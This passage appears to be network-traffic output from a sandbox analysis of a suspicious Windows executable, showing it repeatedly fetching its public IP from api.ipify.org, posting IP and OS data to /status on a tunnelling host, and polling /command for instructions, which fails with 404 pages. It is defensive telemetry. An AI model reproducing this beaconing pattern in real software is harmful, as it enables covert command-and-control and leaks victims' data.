Dec 11, 2024 11:29:28.824376106 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:28.824450016 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49746	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:28.946234941 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:30.188648939 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:30.188750029 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49762	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:35.314178944 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:29:36.414221048 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:29:36 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cb6589e50f8f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1647&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49763	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:36.583581924 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:36.703224897 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:29:37.774983883 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:37.775005102 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49768	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:37.896727085 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:39.135886908 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:39.135961056 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49784	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:44.252919912 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:29:45.343395948 CET	426	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:29:45 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cb9d5e1742be-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2070&rtt_var=1035&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49785	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:45.465281963 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:45.584738016 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:29:46.704885960 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:46.704922915 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49790	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:46.831080914 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:48.064723969 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:48.064821005 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49806	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:53.186218023 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:29:54.283226013 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:29:54 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cbd53d988c1d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1810&rtt_var=905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49811	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:54.403994083 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:54.523399115 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:29:55.641875029 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:55.641901970 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49814	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:55.763283968 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:57.008658886 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:57.008681059 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49830	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:02.141962051 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:03.238280058 CET	426	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:03 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cc0d2d1b425d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2128&min_rtt=2128&rtt_var=1064&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49836	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:03.802741051 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:03.922065973 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:05.037986994 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:05.038131952 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49839	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:05.159054995 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:30:06.416548967 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:06.416699886 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49854	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:11.530519962 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:12.627836943 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:12 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cc47d8ea447a-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49859	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:12.750288010 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:12.869678020 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:13.997986078 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:13.998017073 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49863	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:14.119417906 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
